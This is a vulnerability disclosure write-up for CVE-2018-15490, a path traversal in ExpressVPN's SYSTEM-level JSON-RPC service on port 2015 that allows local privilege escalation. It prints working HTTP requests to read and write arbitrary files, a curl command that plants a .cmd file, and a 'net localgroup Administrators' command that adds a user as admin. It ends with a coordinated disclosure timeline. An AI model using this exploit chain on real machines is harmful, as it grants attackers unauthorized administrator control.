CVE-2018–15490 ExpressVPN local privilege escalation

Two vulnerabilities exist in xvpnd.exe process that allows non-privileged user to read and write files on file system on behalf of the xvpnd.exe process. This could be exploited to local privilege escalation.

Xvpnd.exe process (runs as a service with SYSTEM privileges) listens on 2015 TCPport, which is used as RPC interface for communication with client side of ExpressVpn application. JSON-RPC protocol over HTTP protocol is used for communication. JSON-RPC XVPN.GetPreference and XVPN.SetPreference methods are vulnerable for path traversal and allow to read and write files on the file system.


Proof of concept

In order to make JSON-RPC request it is required access token. Access token is stored on the file C:\ProgramData\ExpressVPN\v4\access_token which is readable for all authenticated users (see screenshot below).

Key parameters’ value for method XVPN.GetPreference is treated as filename and is vulnerable to path traversal. This allows to read any file on the file system with SYSTEM privileges. The following POST request demonstrates the issue:

POST /rpc HTTP/1.1
Accept: application/json, application/xml, text/json, text/x-json, text/javascript, text/xml
User-Agent: RestSharp/105.2.3.0
Content-Type: application/json
Host: localhost:2015
Content-Length: 171
Accept-Encoding: gzip, deflate
{"jsonrpc":"2.0","method":"XVPN.GetPreference","params":{"access_token":"ku8j6opcwv4uqzvwol8rgnh31x04nr24","key":"../../../../../../../../../../Windows/win.ini"},"id":"2"}

Application responds with the content of the file encoded as base64.

XVPN.GetPreference JSON-RPC method is vulnerable in similar manner. It allows to write a file anywhere on the file system. Next request demonstrates how to create a file sectest.txt on Windows folder by interacting with JSON-RPC.

POST /rpc HTTP/1.1
Accept: application/json, application/xml, text/json, text/x-json, text/javascript, text/xml
User-Agent: RestSharp/105.2.3.0
Content-Type: application/json
Host: localhost:2015
Content-Length: 206
Accept-Encoding: gzip, deflate
{"jsonrpc":"2.0","method":"XVPN.SetPreference","params":{"access_token":"ku8j6opcwv4uqzvwol8rgnh31x04nr24","key":"../../../../../../../../../../Windows/sectest.txt","value":"test","type":"string"},"id":"2"}

Next screenshot shows that file was created successfully.

There are many methods to escalate privileges on Windows operating system by having file write privileges anywhere on the system. In this case situation is a bit complicated since written content is between double quotes. Anyway it is possible to create a .cmd file, which calls another .cmd file with additional commands. Additionally, ExpressVPN xvpnd.exe process tries to call many non existing files in C:\Program Files\ExpressVPN\xvpnd folder after disconnecting from VPN server. Procmon allows to see that xvpnd.exe process tries to open many non existing files.

Missing file can be created by abusing described vulnerability and it will be called by xvpnd.exe process.

To summarize, exploitation steps for privilege escalation:

  1. Login to Windows OS with non-admin user.
  2. Launch ExpressVpn application and connect to any VPN server.
  3. Create a file C:\Program Files\ExpressVPN\xvpnd\sc.cmd by issuing the following request to JSON-RPC service.
curl -i -s -k  -X $'POST' \
-H $'Accept: application/json, application/xml, text/json, text/x-json, text/javascript, text/xml' -H $'User-Agent: RestSharp/105.2.3.0' -H $'Content-Type: application/json' -H $'Host: localhost:2015' -H $'Content-Length: 277' -H $'Accept-Encoding: gzip, deflate' \ --data-binary $'{\"jsonrpc\":\"2.0\",\"method\":\"XVPN.SetPreference\",\"params\":{\"access_token\":\"ku8j6opcwv4uqzvwol8rgnh31x04nr24\",\"key\":\"../../../../../../../../../../Program Files/ExpressVPN/xvpnd/sc.cmd\",\"value\":\"C:\\\\Users\\\\standard2\\\\AppData\\\\Local\\\\Temp\\\\exploit.cmd\",\"type\":\"string\"},\"id\":\"2\"}\x0d\x0a' \
$'http://localhost:2015/rpc'

4. Create C:\Users\standard2\AppData\Local\Temp\exploit.cmd file with following content:

net localgroup Administrators standard2 /add

5. Disconnect from VPN server. Then C:\Program Files\ExpressVPN\xvpnd\sc.cmd file should be executed and user standard2 should be added to administrators local group.

Tested version: Windows application ExpressVPN version 6.6.2(4493)


Disclosure Timeline:

June 24, 2018 — Vendor notified about vulnerability

June 25, 2018 — Vendor asked additional details

June 25, 2018 — Additional details were provided

June 25, 2018 — Vendor acknowledged vulnerability, informed that it will be patched in next release. Asked to postpone release of details for six month. Bounty awarded.

July 5, 2018 — Fixed version of ExpressVPN released

December 31, 2018 —Public disclosure